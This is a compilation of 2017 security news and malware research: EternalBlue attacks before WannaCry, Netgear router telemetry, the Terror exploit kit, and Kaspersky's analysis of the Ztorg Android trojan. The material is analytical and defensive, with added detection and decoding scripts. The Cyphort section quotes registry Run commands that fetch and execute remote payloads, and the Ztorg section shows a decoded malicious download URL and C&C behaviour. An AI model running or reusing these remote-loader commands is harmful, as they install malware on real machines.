“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.


At least 3 different groups have been leveraging the NSA EternalBlue exploit. What went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group released the exploit for the SMB vulnerability in April, but according to malware researchers other threats used it well before WannaCry, such as the Adylkuzz botnet, which has been active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

Unlike the WannaCry ransomware, the RAT has no worm capability.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once it has infected a system, the malicious code closes port 445 to prevent other malware from abusing the same SMB flaw.

This suggests the attackers knew they had entered through the EternalBlue vulnerability and wanted to keep the host for themselves.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
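Both values are remote loaders: regsvr32 with `/i:` pointing at an HTTP URL and `scrobj.dll` fetches and runs a scriptlet from the web, and msiexec `/i` with an HTTP URL installs whatever package the server returns. The following is an added example, not from Cyphort or the page, that parses `reg add` lines of this form and flags Run values that hand a remote URL to a living-off-the-land binary. The two malicious lines are the ones quoted above (with straight quotes so they parse), the OneDrive entry is a constructed benign control, and the rule set and the IOC list are assumptions; on a real host the same checks would run over values read from the registry rather than from text.

```python
import re

# Constructed input: the first two lines reproduce the Run values reported
# above (straight quotes instead of the page's typographic ones); the third
# is a made-up benign autostart entry used as a control.
SAMPLE_REG_ADDS = [
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "OneDrive" /d "C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background" /f',
]

REG_ADD = re.compile(
    r'reg\s+add\s+"(?P<key>[^"]+)"\s+/v\s+"?(?P<name>[^"\s]+)"?\s+/d\s+"(?P<data>[^"]*)"',
    re.I)
URL = re.compile(r'https?://[^\s"]+', re.I)

# (description, predicate over the lower-cased command and the URLs in it)
RULES = [
    ("regsvr32 loading a remote scriptlet via scrobj.dll",
     lambda cmd, urls: "regsvr32" in cmd and "scrobj.dll" in cmd and "/i:http" in cmd),
    ("msiexec installing a package from a remote URL",
     lambda cmd, urls: "msiexec" in cmd and bool(urls)),
    ("mshta/rundll32/wscript/cscript given a remote URL",
     lambda cmd, urls: bool(urls) and any(
         b in cmd for b in ("mshta", "rundll32", "wscript", "cscript"))),
]
IOC_DOMAINS = {"js.mykings.top"}   # from the Cyphort-reported values above


def parse_reg_add(line):
    m = REG_ADD.search(line)
    if not m:
        raise ValueError(f"not a reg add line: {line!r}")
    return m.group("key"), m.group("name"), m.group("data")


def url_host(url):
    return re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].split(":")[0].lower()


def inspect_run_value(data):
    """Return the reasons a Run value looks like a remote loader (empty if none)."""
    cmd = data.lower()
    urls = URL.findall(data)
    reasons = [text for text, match in RULES if match(cmd, urls)]
    for u in urls:
        if url_host(u) in IOC_DOMAINS:
            reasons.append(f"contacts known IOC domain {url_host(u)}")
    return reasons


def analyze_run_keys(lines):
    """Map suspicious value names to their key, command and reasons."""
    findings = {}
    for line in lines:
        key, name, data = parse_reg_add(line)
        if not key.lower().endswith("\\currentversion\\run"):
            continue
        reasons = inspect_run_value(data)
        if reasons:
            findings[name] = {"key": key, "command": data, "reasons": reasons}
    return findings


if __name__ == "__main__":
    for name, f in analyze_run_keys(SAMPLE_REG_ADDS).items():
        print(name, "->", f["command"])
        for r in f["reasons"]:
            print("   ", r)
```

The first two rules catch the technique regardless of domain, which matters more than the IOC match: the operators can change `js.mykings.top` at will, but an autostart entry that makes regsvr32 or msiexec fetch its payload over HTTP has no legitimate use on a workstation.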
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

That multiple groups were exploiting EternalBlue weeks before WannaCry is also shown by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”


The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but unlike WannaCry it runs entirely in the memory of the infected system after exploitation via EternalBlue, leaving no file on disk.

In late April, Secdo also observed another attack exploiting the EternalBlue vulnerability, which it associated with a Chinese threat actor using a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

In summary, at least three different groups were leveraging the NSA exploit weeks before WannaCry. Either a significant part of the security community failed to monitor the threat, or those who observed the attacks failed to share what they had seen.

The success of the EternalBlue attacks is a failure of our current model of cyber security.


Netgear Now Collects Router 'Analytics Data' — Here’s How to Disable It
22.5.2017 CyberSpy

Is your router collecting data on your network?
Netgear last week pushed out a firmware update for its Nighthawk R7000 wireless router with a remote data collection feature that gathers the router's analytics data and sends it to the company's servers.
For now the update has been rolled out only for the Nighthawk R7000, but other models will probably receive it in the coming days.
According to Netgear, the router analytics data includes:
Total number of devices connected to the router
IP address
MAC addresses
Serial number
Router's running status
Types of connections
LAN/WAN status
Wi-Fi bands and channels
Technical details about the use and functioning of the router and the WiFi network.
The company says it collects the data for routine diagnostics, to learn how its products are used and how its routers behave.
"Technical data about the functioning and use of our routers and their WiFi network can help us to more quickly isolate and debug general technical issues, improve router features and functionality, and improve the performance and usability of our routers," Netgear said on its website.
How to Disable your Router Analytics Data Collection Feature
But if you are privacy conscious and don't want Netgear to collect details on you, you can disable this feature.
The company has provided an option in the router's configuration panel to turn the router analytics data collection feature off. Follow the instructions:
Launch a web browser from your PC or smartphone that is connected to the network.
Open the router login window by entering http://www.routerlogin.net.
Type the router username and password. If you haven't changed the default settings, your username is admin, and password is password.
Select Advanced → Administration → Router Update on the Home page.
Scroll down to the Router Analytics Data Collection section and select the Disable button to disable router analytics data collections.
Click the Apply button to save your settings.
That's it. You're done.
Boost And Secure Your Routers With DD-WRT

Alternatively, you can replace your device firmware with DD-WRT – a Linux-based open source firmware that is designed to enhance security and performance of wireless Internet routers.
DD-WRT is compatible with many router models from manufacturers such as Linksys, Cisco, Netgear, Asus, TP-Link and D-Link, and many security-conscious users prefer it to the factory firmware.
DD-WRT has a ton of features – it improves your wireless signal, as well as unlocks your router's potential to manage network traffic, static routing, VPN, repeating functions and more.
To check if your router is compatible with DD-WRT, head on to 'DD-WRT database' and search for your router model number.

If it's there and supported, then download it and follow below-mentioned general steps to install it:
Log into your router's admin page (usually at http://192.168.1.1/).
Go to the Admin section and choose "Firmware Upgrade."
Choose "Select File" and find your DD-WRT firmware.
Upload it and do not unplug or do anything to the router until it finishes updating.
Note: Changing your router's firmware with a non-compatible firmware can brick your router. So be very careful.


Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities
22.5.2017 securityaffairs Exploit

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at Malwarebytes initially thought Terror was simply a new Sundown variant, but further investigation showed that it came from a different actor (Trustwave gave it the Terror EK name).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites redirected visitors to the exploit kit landing page with a server-side HTTP 302 redirect, triggered by script injected into the site.

The exploit kit had been observed carpet bombing victims with many exploits at once, but Talos researchers have now observed a significant change in tactics: the Terror exploit kit has been improved with new exploits and has implemented fingerprinting. The fingerprinting lets the EK decide which exploit to use against a given target system.

The new variant of the Terror exploit kit determines the specific OS running on the victim’s PC, the browser version, and the installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website operating as a malware gate. The site initially redirected visitors to a RIG landing page; after a single day of analysis, the gate switched to the Terror exploit kit.

“Terror seems to be constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using a URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.


The page uses obfuscated JavaScript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated JavaScript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.


 


Ztorg: money for infecting your smartphone
22.5.2017 Kaspersky Mobil

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as Trojan.AndroidOS.Ztorg.ad. After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.

Popularity

These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.


However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.

Comments

There were lots of comments saying that people downloaded these apps for credits/coins/etc.


In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising

Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.


To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:


mobi.appcoins

https://play.google.com/store/apps/details?id=mobi.appcoins


com.smarter.superpocket

https://play.google.com/store/apps/details?id=com.smarter.superpocket


com.moneyreward.fun

https://play.google.com/store/apps/details?id=com.moneyreward.fun

And of course they offered malware too:


All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.

Campaigns

So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually supersonicads.com and aptrk.com).

After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to global.ymtracking.com or avazutracking.net. These URLs are related to the ads too.

Then it redirects to track.iappzone.net.

And the final URL that leads to the Google Play Store was app.adjust.com.

All the offers that I was able to dump had track.iappzone.net and app.adjust.com.

adjust.com is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

https://app.adjust.com/4f1lza?redirect=https://play.google.com/store/apps/details?id=com.game.puzzle.green&install_callback=http://track.iappzone.net…

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from iappzone.net look like this:

http://track.iappzone.net/click/click?offer_id=3479&aff_id=3475&campaign=115523_201|1002009&install_callback=http://track.supersonicads.com/api/v1/processCommissionsCallback.php?advertiserId=85671&password=540bafdb&dynamicParameter=dp5601581629793224906

This URL structure (offer_id=..&aff_id=..&campaign=..) belongs to the OffersLook tracking system. It carries several potentially useful fields, such as the offer ID and affiliate ID, but the cybercriminals vary these values, which made those parameters useless for tracking. The exception is install_callback: this parameter contains the name of the ad service.

While searching for iappzone.net I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that iappzone.net used the IP 52.74.22.232. The same IP was used by aedxdrcb.com, which was mentioned in Check Point’s Gooligan report. A few weeks after that report was made public, iappzone.net (which wasn’t mentioned in the report) was moved to a new IP – 139.162.57.41.

Ad modules

Luckily I was able to find iappzone.net not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server api2.batmobil.net.


The user sees a list of advertised apps:


After the user clicks on the ads, they are redirected to the Google Play Store.


In this case, the redirects look like this:

api2.batmobil.net -> global.ymtracking.com -> tracking.acekoala.com -> click.apprevolve.com -> track.iappzone.net -> app.adjust.com -> play.google.com

After analyzing ad campaigns containing iappzone.net, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources

track.iappzone.net callbacks

Yeahmobi (global.ymtracking.com) 41%
Mobvista (next.mobvista.com) 34%
Avazu (postback.apx.avazutracking.net) 18%
Supersonicads (track.supersonicads.com) 7%

However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi -> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.
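The attribution of callbacks to ad networks described above can be reproduced with a short script. The following Python is an added example, not Kaspersky’s tooling: the click URLs are constructed to match the OffersLook-style shape quoted in the article (IDs and callback parameters are placeholders), the network hostnames are the four listed under “Ad sources”, and the rule of taking everything after install_callback= as the callback is an assumption that holds for the URLs the article shows, where the nested callback URL is pasted in unencoded as the last parameter.

```python
from collections import Counter
from typing import Dict, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Ad networks the article attributes to track.iappzone.net callbacks;
# hostnames are the ones listed under "Ad sources".
AD_NETWORKS = {
    "global.ymtracking.com": "Yeahmobi",
    "next.mobvista.com": "Mobvista",
    "postback.apx.avazutracking.net": "Avazu",
    "track.supersonicads.com": "Supersonicads",
}

# Constructed sample click URLs in the shape the article shows.
# Offer/affiliate IDs, campaign names and callback parameters are placeholders.
SAMPLE_CLICK_URLS = [
    "http://track.iappzone.net/click/click?offer_id=1001&aff_id=11&campaign=c1"
    "&install_callback=http://global.ymtracking.com/postback?clickid=AAA&event=install",
    "http://track.iappzone.net/click/click?offer_id=1002&aff_id=12&campaign=c2"
    "&install_callback=http://next.mobvista.com/cb?id=BBB&type=1",
    # Percent-encoded callback, as a well-behaved tracker would emit it.
    "http://track.iappzone.net/click/click?offer_id=1003&aff_id=13&campaign=c3"
    "&install_callback=http%3A%2F%2Fpostback.apx.avazutracking.net%2Fpb%3Fcid%3DCCC",
    "http://track.iappzone.net/click/click?offer_id=1004&aff_id=14&campaign=c4"
    "&install_callback=http://track.supersonicads.com/api/v1/processCommissionsCallback.php"
    "?advertiserId=PLACEHOLDER&password=PLACEHOLDER",
    "http://track.iappzone.net/click/click?offer_id=1005&aff_id=15&campaign=c5"
    "&install_callback=http://global.ymtracking.com/postback?clickid=DDD",
    # No callback at all: must be skipped, not mis-attributed.
    "http://track.iappzone.net/click/click?offer_id=1006&aff_id=16&campaign=c6",
]


def extract_install_callback(click_url: str) -> Optional[str]:
    """Return the install_callback value, or None when the URL has none.

    The nested callback URL is usually pasted in unencoded, so its own
    '&'-separated parameters would be cut off by a normal query-string parser.
    Since install_callback is the last parameter in every URL the article
    shows, everything after 'install_callback=' is taken as the callback.
    """
    marker = "install_callback="
    pos = click_url.find(marker)
    if pos == -1:
        return None
    return unquote(click_url[pos + len(marker):])


def callback_network(click_url: str) -> Optional[str]:
    """Map a click URL to the ad network named by its install_callback host."""
    callback = extract_install_callback(click_url)
    if callback is None:
        return None
    host = urlsplit(callback).hostname
    if not host:
        return None
    return AD_NETWORKS.get(host.lower(), "unknown:" + host.lower())


def attribute_ad_sources(click_urls) -> Tuple[Counter, Dict[str, int]]:
    """Count callback networks over a set of click URLs and express each as a
    rounded percentage of attributable URLs, like the article's breakdown."""
    counts: Counter = Counter()
    for url in click_urls:
        network = callback_network(url)
        if network is not None:
            counts[network] += 1
    total = sum(counts.values())
    shares = {name: round(100 * n / total) for name, n in counts.items()} if total else {}
    return counts, shares


if __name__ == "__main__":
    counts, shares = attribute_ad_sources(SAMPLE_CLICK_URLS)
    for name, n in counts.most_common():
        print(f"{name:<14} {n:>2} URL(s)  {shares[name]:>3}%")
```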

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:

[sdcard]/.android/ceroa/play/
[sdcard]/.nativedroid/download/
[sdcard]/.sysAndroid/download/
[sdcard]/.googleplay_download/
[sdcard]/.walkfree/apks/583737491/
[sdcard]/Android/data/TF47HV2VFKD9/
[sdcard]/Android/Data/snowfoxcr/
[sdcard]/DownloadProvider/download/

I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder name | Type | Detection %*
DownloadProvider | Malware | 81%
TF47HV2VFKD9 | Malware | 56%
snowfoxcr | AdWare | 51%
nativedroid | Malware | 48%
.walkfree | AdWare | 33%
ceroa | AdWare | 20%
sysAndroid | Malware | 16%
.googleplay_download | Malware | 15%

* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps

Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

Package name | Publisher email
com.equalizer.goods.listener | trantienfariwuay@gmail.com
com.ele.wall.papers | nguyenduongsizang@gmail.com
com.game.free.plus.prefect | liemproduction08@gmail.com
com.green.compass.star | longhahoanghuong@gmail.com
com.voice.equalizer.musicssss | baoanstudio@gmail.com
com.amusing.notes.done | trunggapin@gmail.com
com.booster.ram.app.master.clean | lakonmesminh@gmail.com
com.game.puzzle.green | zentinlong@gmail.com
com.listen.music.pedometer | tramhuyenthoai9a@gmail.com
com.live.paper.watch.analog | nguyenthokanuvuong@gmail.com

When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.

Dalvik

Every infected app from Google Play with this type of malicious module was protected by a packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. The malicious code is triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events, meaning that it only starts executing after the user installs, updates or removes an app.


As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C (em.kmnsof.com/only) and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.

Native

Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.


The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.


In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the com.android.vending package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.


It receives: “BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg==”


The library base64-decodes this answer and XORs it with the key 0x66.

Result:

b.a.b.a,b,http://dow.nctylmtp.com/hy/hy003/gp003.apk,80

g_class_name = b.a.b.a

g_method_name = b

g_url = http://dow.nctylmtp.com/hy/hy003/gp003.apk

g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.
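To make the decoding steps concrete, here is an added Python example (neither the MyGame library’s code nor Kaspersky’s) that reproduces them on the response quoted above: base64-decode, XOR with 0x66, then split the four comma-separated fields into g_class_name, g_method_name, g_url and g_key. It assumes the g_key value 80 is decimal, and the ‘PK’ magic check on the unpacked download is added here as a sanity check; the same single-byte XOR is what the dropper variant described later applies to its info.data asset with key 0x12.

```python
import base64
from typing import Dict

# Response quoted in the article for com.unit.conversion.use, and the key
# the article says the MyGame library XORs it with.
CC_RESPONSE_B64 = "BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg=="
RESPONSE_XOR_KEY = 0x66


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR: the transform used for the C&C answer (0x66), the
    downloaded payload (g_key) and the dropper's info.data asset (0x12)."""
    if not 0 <= key <= 0xFF:
        raise ValueError("single-byte key expected")
    return bytes(b ^ key for b in data)


def decode_cc_response(b64_text: str, key: int = RESPONSE_XOR_KEY) -> Dict[str, object]:
    """base64-decode the C&C answer, XOR it, and split out the four
    comma-separated fields the article names."""
    plain = xor_bytes(base64.b64decode(b64_text), key).decode("ascii")
    fields = plain.split(",")
    if len(fields) != 4:
        raise ValueError(f"expected 4 comma-separated fields, got {len(fields)}: {plain!r}")
    class_name, method_name, url, key_text = fields
    if not url.startswith(("http://", "https://")) or not key_text.isdigit():
        raise ValueError(f"unexpected field layout: {plain!r}")
    return {
        "plaintext": plain,
        "g_class_name": class_name,
        "g_method_name": method_name,
        "g_url": url,
        # The article lists g_key as 80; decimal is assumed (not stated on the page).
        "g_key": int(key_text),
    }


def unpack_payload(xored_apk: bytes, g_key: int) -> bytes:
    """Reverse the payload obfuscation: XOR the downloaded file with g_key and
    check for the ZIP/APK magic ('PK') before anything would load it. A wrong
    key (for example hex 0x80 where decimal 80 was meant) fails this check."""
    plain = xor_bytes(xored_apk, g_key)
    if plain[:2] != b"PK":
        raise ValueError("XOR with g_key did not yield a ZIP/APK container")
    return plain


if __name__ == "__main__":
    info = decode_cc_response(CC_RESPONSE_B64)
    for name, value in info.items():
        print(f"{name} = {value}")
```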

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.

Dropper

In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called info.data is xored with 0x12 and then loaded using the ClassLoad method.


Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs on the down.118pai.com domain didn’t work at the time of this research; all of the files fetched from those URLs can also be dropped. The files that are only downloaded and cannot be dropped have URLs on the domains sololauncher.mobi and freeplayweb.com, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the down.118pai.com domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/install-recovery.sh file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools

File name | Tool name | MD5
data/files/.zog/.a | chattr | 9CAE8D66BE1103D737676DBE713B4E52
data/files/.zog/.a | chattr | 1E42373FA7B9339C6C0A2472665BF9D4
data/files/.zog/supolicy | supolicy | cdceafedf1b3c1d106567d9ff969327a
data/files/.zog/busybox | busybox | 3bc5b9386c192d77658d08fe7b8e704f
data/files/.zog/.j | Patched su | 8fb60d98bef73726d4794c2fc28cd900

Exploits, exploit packs, exploit droppers

File name | Name | MD5 | Detection name
data/files/.Ag/Agcr | Agcr32 | D484A52CFB0416CE5294BF1AC9346B96 | Exploit.AndroidOS.Lotoor.bv
data/files/.Ag/Agcr | Agcr64 | B111DD21FD4FCEFDC8268327801E55CE | Exploit.AndroidOS.Lotoor.bv
data/files/.zog/.ag/bx | Bx | 70EBFA94C958E6E6A7C6B8CD61B71054 | Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/cx | cx | 892E033DA182C06794F2B295377B8A65 | Exploit.AndroidOS.Lotoor.bu
data/files/.zog/exp | exp | 6E17234C57308012911C077A376538DC | Exploit.AndroidOS.Lotoor.bz
data/files/.zog/.ag/nn.zip | maink.apk/boy | ab9202ccfdd31e685475ba895d1af351 | script
data/files/.zog/.ag/nn.zip | maink.apk/bx | 70ebfa94c958e6e6a7c6b8cd61b71054 | Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym | ym32 | F973BAA67B170AB52C4DF54623ECF8B3 | Exploit.AndroidOS.Lotoor.bu
